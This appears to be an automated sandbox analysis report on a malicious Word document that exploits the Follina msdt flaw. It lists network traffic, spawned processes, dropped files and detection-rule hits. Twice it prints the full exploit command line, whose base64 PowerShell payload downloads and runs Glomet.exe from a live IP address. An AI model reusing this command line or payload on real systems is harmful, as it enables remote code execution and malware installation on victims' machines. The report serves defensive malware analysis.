      Source: global trafficHTTP traffic detected: GET /Glomet.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 45.141.237.18Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Glomet.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 45.141.237.18If-Modified-Since: Thu, 14 Jul 2022 16:59:59 GMTIf-None-Match: "80119226a397d81:0"Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /icons/ubuntu-logo.png HTTP/1.1Accept: */*Referer: http://45.141.237.18/Glomet.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.141.237.18Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Glomet.exe HTTP/1.1Host: 45.141.237.18Connection: Keep-Alive
      Source: C:\ProgramData\Glomet.exeCode function: 29_2_004054B6 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,29_2_004054B6

      System Summary

      barindex
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
      Source: Document image extraction number: 0Screenshot OCR: enable editing" to view content ~ 0 ~ 0 4~~ - m " gm " . ~ ~ m~ ~ Wp 0 0 mb ~ "
      Source: Document image extraction number: 1Screenshot OCR: enable editing" to view content wm "
      Source: Screenshot number: 16Screenshot OCR: enable editing" to view content X Program Compatibility Troubleshooter Detecting issues Cancel
      Source: Screenshot number: 20Screenshot OCR: enable editing" to view content .. . _ ,., Page 1 of 3 0 words 112 O Type here to search m % -
      Source: Screenshot number: 24Screenshot OCR: enable editing" to view content X m Program Compatibility Troubleshooter Cancel 0 words It? O T
      Source: Screenshot number: 28Screenshot OCR: enable editing" to view content X m Program Compatibility Troubleshooter Cancel 0 words It? O T
      Source: 0000000D.00000002.576330720.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: 0000000D.00000002.576021489.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: 0000000D.00000002.577239005.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: 0000000D.00000002.576945424.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: Process Memory Space: msdt.exe PID: 7084, type: MEMORYSTRMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\ProgramData\Glomet.exeCode function: 29_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,29_2_004033B3
      Source: C:\ProgramData\Glomet.exeCode function: 29_2_0040727F29_2_0040727F
      Source: C:\ProgramData\Glomet.exeCode function: 29_2_00406AA829_2_00406AA8
      Source: api-ms-win-core-timezone-l1-1-0.dll.29.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-stdio-l1-1-0.dll.29.drStatic PE information: No import functions for PE file found
      Source: DiagPackage.dll.13.drStatic PE information: No import functions for PE file found
      Source: DiagPackage.dll.mui.13.drStatic PE information: No import functions for PE file found
      Source: MsMpRes.dll.29.drStatic PE information: No import functions for PE file found
      Source: DiagPackage.dll.13.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: DiagPackage.dll.13.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: DiagPackage.dll.13.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXESection loaded: sfc.dllJump to behavior
      Source: libmpdec-2.dll.29.drStatic PE information: Number of sections : 11 > 10
      Source: 20220714 DWG.docVirustotal: Detection: 8%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4IChuZXctb2JqZWN0IHN5c3RlbS5uZXQud2ViY2xpZW50KS5kb3dubG9hZGZpbGUoImh0dHA6Ly80NS4xNDEuMjM3LjE4L0dsb21ldC5leGUiLCJjOlxwcm9ncmFtZGF0YVxHbG9tZXQuZXhlIik7U3RhcnQtUHJvY2VzcyAiYzpccHJvZ3JhbWRhdGFcR2xvbWV0LmV4ZSI='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q0vyiohn\q0vyiohn.cmdline
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES216A.tmp" "c:\Users\user\AppData\Local\Temp\q0vyiohn\CSC14339BC3D3E94BA0AEA5453DEFD3E9E.TMP"
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ea13q231\ea13q231.cmdline
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EE5.tmp" "c:\Users\user\AppData\Local\Temp\ea13q231\CSCF24C6B632D84EA4B9FDE29780CB1444.TMP"
      Source: unknownProcess created: C:\ProgramData\Glomet.exe "C:\programdata\Glomet.exe"
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\llhoph4d\llhoph4d.cmdline
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDEDE.tmp" "c:\Users\user\AppData\Local\Temp\llhoph4d\CSCA6DEB1F21B847AF87589FE9AEBF81D1.TMP"
      Source: C:\ProgramData\Glomet.exeProcess created: C:\Windows\SysWOW64\cmd.exe CMD.EXE /C SET /A "0x00^75"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exeJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4IChuZXctb2JqZWN0IHN5c3RlbS5uZXQud2ViY2xpZW50KS5kb3dubG9hZGZpbGUoImh0dHA6Ly80NS4xNDEuMjM3LjE4L0dsb21ldC5leGUiLCJjOlxwcm9ncmFtZGF0YVxHbG9tZXQuZXhlIik7U3RhcnQtUHJvY2VzcyAiYzpccHJvZ3JhbWRhdGFcR2xvbWV0LmV4ZSI='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTOJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES216A.tmp" "c:\Users\user\AppData\Local\Temp\q0vyiohn\CSC14339BC3D3E94BA0AEA5453DEFD3E9E.TMP"Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EE5.tmp" "c:\Users\user\AppData\Local\Temp\ea13q231\CSCF24C6B632D84EA4B9FDE29780CB1444.TMP"Jump to behavior
      Source: C:\ProgramData\Glomet.exeProcess created: C:\Windows\SysWOW64\cmd.exe CMD.EXE /C SET /A "0x00^75"Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDEDE.tmp" "c:\Users\user\AppData\Local\Temp\llhoph4d\CSCA6DEB1F21B847AF87589FE9AEBF81D1.TMP"Jump to behavior
      Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32Jump to behavior
      Source: 20220714 DWG.doc.LNK.0.drLNK file: ..\..\..\..\..\Desktop\20220714 DWG.doc
      Source: C:\ProgramData\Glomet.exeCode function: 29_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,29_2_004033B3
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{3A2858FD-E981-4180-86E7-4C2D0F3F33EC} - OProcSessId.datJump to behavior
      Source: classification engineClassification label: mal72.expl.winDOC@20/52@0/2
      Source: C:\ProgramData\Glomet.exeCode function: 29_2_00402173 CoCreateInstance,MultiByteToWideChar,29_2_00402173
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\ProgramData\Glomet.exeCode function: 29_2_00404766 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,29_2_00404766
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5492:120:WilError_01
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.iniJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
      Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLLJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
      Source: C:\ProgramData\Glomet.exeRegistry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\Gratinr\Wr242\Boomerangernes\HypercenosisJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.29.dr
      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.29.dr

      Data Obfuscation

      barindex
      Obfuscated command line found
      Source: C:\ProgramData\Glomet.exeProcess created: C:\Windows\SysWOW64\cmd.exe CMD.EXE /C SET /A "0x00^75"
      Source: C:\ProgramData\Glomet.exeProcess created: C:\Windows\SysWOW64\cmd.exe CMD.EXE /C SET /A "0x00^75"Jump to behavior
      Source: libmpdec-2.dll.29.drStatic PE information: section name: .xdata
      Source: api-ms-win-core-timezone-l1-1-0.dll.29.drStatic PE information: 0xFC0D7D83 [Wed Jan 2 18:42:11 2104 UTC]
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q0vyiohn\q0vyiohn.cmdline
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ea13q231\ea13q231.cmdline
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\llhoph4d\llhoph4d.cmdline
      Source: C:\ProgramData\Glomet.exeFile created: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\GENOPBYGGEDE\Intraretinal\Tilstningsfries\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ea13q231\ea13q231.dllJump to dropped file
      Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\DiagPackage.dllJump to dropped file
      Source: C:\ProgramData\Glomet.exeFile created: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\REDO\DYSMENORRHEIC\Tidehead7\Kartonens\MsMpRes.dllJump to dropped file
      Source: C:\ProgramData\Glomet.exeFile created: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Fns\differentieringerne\PHOTOCOMPOSE\serpigoes\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
      Source: C:\ProgramData\Glomet.exeFile created: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\libmpdec-2.dllJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\llhoph4d\llhoph4d.dllJump to dropped file
      Source: C:\ProgramData\Glomet.exeFile created: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Strawberries\MOLAKKORD\SetEHCIKey.exeJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\q0vyiohn\q0vyiohn.dllJump to dropped file
      Source: C:\ProgramData\Glomet.exeFile created: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dllJump to dropped file
      Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\en-US\DiagPackage.dll.muiJump to dropped file
      Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\DiagPackage.dllJump to dropped file
      Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\en-US\DiagPackage.dll.muiJump to dropped file
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXERegistry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ExplorerJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
